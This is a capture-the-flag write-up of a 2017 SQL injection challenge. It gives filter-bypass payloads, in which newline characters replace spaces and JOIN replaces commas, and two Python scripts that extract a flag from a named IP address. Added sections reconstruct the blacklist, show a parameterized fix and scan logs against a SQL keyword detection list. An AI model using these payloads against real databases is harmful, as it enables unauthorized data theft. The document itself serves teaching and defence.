SQL Join Injection in DDCTF 2017

DDCTF is a Re-CTF……Orz,
and its SQLi problem is very interesting.

It looks like boolean-based blind injection, and the filter bans "," and " " (the comma and the space).
Easy! Just use this payload (%0D, a carriage return, stands in for the space; parentheses and the FROM ... FOR form of substr() avoid the comma):

?id=4%0Dand%0Dascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))from({n})for(1)))={ord(char)}

Iterating {n} and {ord(char)} recovers the structure:

Database: t1
Table: news
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| title    | varchar(50) |
| content  | text        |
| secret   | text        |
+----------+-------------+

gogogo! next

select secret from news where id=4;

...but "secret" is BANNED too!

……

Let’s try another way.
The page shows TITLE and CONTENT, so we can try UNION SELECT.
Since "," is banned, we can build the column list with JOIN instead :D

mysql> SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
mysql> SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT F.4 from (select * from (select 1)i join (select 2)j join (select 3)k join (select 4)l union select 1,2,3,version())F limit 1 offset 1)d;
+---+---+---+-------------------------+
| 1 | 2 | 3 | 4                       |
+---+---+---+-------------------------+
| 1 | 2 | 3 | 5.7.17-0ubuntu0.16.04.1 |
+---+---+---+-------------------------+

So our payload:

import requests

# id=-1 matches no real row, so only the UNION row is rendered into TITLE and CONTENT.
url = 'http://118.190.134.8/t1/news.php?id=-1'
# JOIN replaces the banned comma; every space becomes %0a (newline) because " " is banned too.
# X.{column} picks one column of the inner union (4 = secret), {row} is the offset of the news row.
payload = (" union select * from (select 1)A join (select 2)B join"
           " (select X.{column} from (select * from (select 1)a join (select 2)b"
           " join (select 3)c join (select 4)d union select * from news)X"
           " limit 1 offset {row})C join (select 4)D").format(column=4, row=4).replace(' ', '%0a')
rep = requests.get(url + payload)
print(rep.text)
print('Payload >>> ' + url + payload)

Bingo!

➜  ~ python dd_web1.py 
<html>
<head>
    <title>programmer news </title>
</head>
<body>

<h1>2</h1><p>flag{DDCTF-88458a95f96c4dfea359d1de2b03bbdb@didichuxing.com}</p></body>
</html>
Payload >>> http://118.190.134.8/t1/news.php?id=-1%0aunion%0aselect%0a*%0afrom%0a(select%0a1)A%0ajoin%0a(select%0a2)B%0ajoin%0a(select%0aX.4%0afrom%0a(select%0a*%0afrom%0a(select%0a1)a%0ajoin%0a(select%0a2)b%0ajoin%0a(select%0a3)c%0ajoin%0a(select%0a4)d%0aunion%0aselect%0a*%0afrom%0anews)X%0alimit%0a1%0aoffset%0a4)C%0ajoin%0a(select%0a4)D

Refer: http://www.venenof.com/index.php/archives/240/
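Both payloads in this post get through because the challenge only blacklists characters and one keyword. As an added example (not part of the original writeup and not the challenge's own code), the following Python reconstructs that blacklist, shows the two payloads from this post passing it, and puts the hardened handler beside it: the id parameter is allow-listed as a plain decimal integer and then bound as a query parameter. The table layout is the one recovered above; the row contents, the placeholder secret, the `vulnerable_sql` reconstruction and all function names are my own assumptions.

```python
import re
import sqlite3

# Blacklist the challenge applied, reconstructed from the writeup: the comma, the space
# and the word "secret" are rejected; everything else reaches the query unchanged.
BANNED = (",", " ", "secret")

# The two payloads from this post with their URL-encoding decoded (%0D -> "\r", %0a -> "\n").
# The blind probe compares against 110 ('n') here; the post iterates that value.
BLIND_PAYLOAD = (
    "4\rand\rascii(substr((select(group_concat(table_name))"
    "from(information_schema.tables)where(table_schema=database()))from(1)for(1)))=110"
)
JOIN_PAYLOAD = (
    "-1\nunion\nselect\n*\nfrom\n(select\n1)A\njoin\n(select\n2)B\njoin\n"
    "(select\nX.4\nfrom\n(select\n*\nfrom\n(select\n1)a\njoin\n(select\n2)b\njoin\n"
    "(select\n3)c\njoin\n(select\n4)d\nunion\nselect\n*\nfrom\nnews)X\n"
    "limit\n1\noffset\n4)C\njoin\n(select\n4)D"
)


def blacklist_allows(id_param: str) -> bool:
    """True when the naive blacklist lets the value through to the query."""
    return not any(bad in id_param for bad in BANNED)


def vulnerable_sql(id_param: str) -> str:
    """Constructed model of the challenge's query builder: the value is pasted into
    the statement, so anything that passes the blacklist becomes SQL."""
    if not blacklist_allows(id_param):
        raise ValueError("blocked by blacklist")
    return f"SELECT title, content FROM news WHERE id={id_param}"


def build_db() -> sqlite3.Connection:
    """In-memory copy of the recovered table layout with constructed contents."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER, title TEXT, content TEXT, secret TEXT)")
    con.execute("INSERT INTO news VALUES (4, 'hello', 'world', 'flag{placeholder-not-the-real-flag}')")
    return con


def lookup_news_safe(con: sqlite3.Connection, id_param: str):
    """Hardened handler: allow-list the shape of the input, then bind it as a parameter.
    No character blacklist is involved, so newline-for-space and JOIN-for-comma are irrelevant."""
    if not re.fullmatch(r"[0-9]{1,10}", id_param):
        raise ValueError("id must be a decimal integer")
    return con.execute(
        "SELECT title, content FROM news WHERE id = ?", (int(id_param),)
    ).fetchone()


def safe_rejects(con: sqlite3.Connection, id_param: str) -> bool:
    """True when the hardened handler refuses the value before touching the database."""
    try:
        lookup_news_safe(con, id_param)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    for name, value in (("blind", BLIND_PAYLOAD), ("join", JOIN_PAYLOAD)):
        print(f"{name}: blacklist allows={blacklist_allows(value)}, hardened rejects={safe_rejects(db, value)}")
    print("legit id=4 ->", lookup_news_safe(db, "4"))
```

The point of the pairing: a blacklist has to enumerate every substitute for the space and the comma (the post found two in a few minutes), whereas the allow-list plus bound parameter never lets the value be parsed as SQL at all.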


Here’s another solution: Union Blind Injection. The guess goes into the fourth column of the UNION row, and ORDER BY 4 DESC reveals whether it sorts above the secret, one character at a time.

# Author: 胖虎(...)
import requests

base = "http://118.190.134.8/t1/news.php?id=4%0aUNION%0aall%0aSELECT%0a*%0aFROM%0a((SELECT%0a1)a%0aJOIN%0a(SELECT%0a2)b%0aJOIN%0a(SELECT%0a0x33)c%0aJOIN%0a(SELECT%0a"
payload = "0x"
tail = ")d)%0aorder%0aby%0a4%0adesc"
# Reference page: with 0x67 ('g') in the fourth column the UNION row sorts above the secret,
# so it is the row rendered. Any candidate prefix that also sorts above the secret gives this same page.
txt = requests.get(base + "0x67" + tail).content
flag = ""
# Candidate characters as hex, in ascending order: '-' '.' '0'-'9' '@' 'A'-'Z' 'a'-'z' '{' '}' '~'
sqllist = ["2D","2E","30","31","32","33","34","35","36","37","38","39","40","41","42","43","44","45","46","47","48","49","4A","4B","4C","4D","4E","4F","50","51","52","53","54","55","56","57","58","59","5A","61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76","77","78","79","7A","7B","7D","7E"]
for x in range(62):
    done = True
    for y in range(len(sqllist)):
        attack = requests.get(base + payload + sqllist[y] + tail).content
        if attack == txt:
            if y == 0:
                # even the smallest candidate sorts above the secret: the prefix already equals it
                break
            # the first candidate that sorts above the secret means the previous one is the real character
            flag += bytes.fromhex(sqllist[y - 1]).decode()
            payload += sqllist[y - 1]
            done = False
            break
    print(flag)
    if done:
        break
print("ok")
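Seen from the server side, both solutions share one signature: a parameter that should be an integer arrives containing carriage-return or newline bytes and SQL keywords. As an added example (not from the original post, the second author, or the challenge), this Python scans constructed access-log lines, three of which carry the request shapes seen in this post, decodes the id parameter and flags anything that is not a plain integer, naming the tokens that would justify an alert. The log lines, client IPs and timestamps are constructed, and the function names are my own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines. Lines 2-4 carry the three request shapes from this post
# (JOIN union, UNION ALL ... ORDER BY, and the %0D blind probe); lines 1 and 5 are normal.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Apr/2017:10:00:01 +0800] "GET /t1/news.php?id=4 HTTP/1.1" 200 512',
    '10.0.0.9 - - [08/Apr/2017:10:00:07 +0800] "GET /t1/news.php?id=-1%0aunion%0aselect%0a*%0afrom%0a(select%0a1)A%0ajoin%0a(select%0a2)B%0ajoin%0a(select%0aX.4%0afrom%0a(select%0a*%0afrom%0a(select%0a1)a%0ajoin%0a(select%0a2)b%0ajoin%0a(select%0a3)c%0ajoin%0a(select%0a4)d%0aunion%0aselect%0a*%0afrom%0anews)X%0alimit%0a1%0aoffset%0a4)C%0ajoin%0a(select%0a4)D HTTP/1.1" 200 640',
    '10.0.0.9 - - [08/Apr/2017:10:00:09 +0800] "GET /t1/news.php?id=4%0aUNION%0aall%0aSELECT%0a*%0aFROM%0a((SELECT%0a1)a%0aJOIN%0a(SELECT%0a2)b%0aJOIN%0a(SELECT%0a0x33)c%0aJOIN%0a(SELECT%0a0x67)d)%0aorder%0aby%0a4%0adesc HTTP/1.1" 200 520',
    '10.0.0.9 - - [08/Apr/2017:10:00:11 +0800] "GET /t1/news.php?id=4%0Dand%0Dascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))from(1)for(1)))=110 HTTP/1.1" 200 512',
    '10.0.0.5 - - [08/Apr/2017:10:00:15 +0800] "GET /t1/news.php?id=12 HTTP/1.1" 200 498',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Tokens worth naming in an alert; matched after decoding and whitespace normalisation,
# so %0a / %0D substitutes for the space do not hide them.
KEYWORDS = ("union", "select", "join", "order by", "information_schema", "substr", "ascii(")


def decoded_id(line: str):
    """Extract the id query parameter from a combined-log line, percent-decoded; None if absent."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    values = parse_qs(query, keep_blank_values=True).get("id")
    return values[0] if values else None


def classify_id(value: str) -> list:
    """Allow-list check: a numeric id is clean; otherwise list why the value is suspicious."""
    if re.fullmatch(r"[0-9]+", value):
        return []
    reasons = []
    if re.search(r"[\r\n\t\x0b\x0c]", value):
        reasons.append("control-char whitespace")
    normalised = re.sub(r"\s+", " ", value.lower())
    reasons.extend(kw for kw in KEYWORDS if kw in normalised)
    if not reasons:
        reasons.append("non-numeric id")
    return reasons


def scan_log(lines) -> list:
    """Return one finding per suspicious request: line number (1-based), decoded id, reasons."""
    findings = []
    for number, line in enumerate(lines, start=1):
        value = decoded_id(line)
        if value is None:
            continue
        reasons = classify_id(value)
        if reasons:
            findings.append({"line": number, "id": value, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['reasons']} <- {f['id'][:60]!r}")
```

The allow-list test (`[0-9]+` on the decoded value) is what catches all three requests; the keyword list only labels the finding. Decoding before matching matters: the raw log shows `%0a` and `%0D`, and a rule that looks for literal spaces around `union` would miss every request in this post.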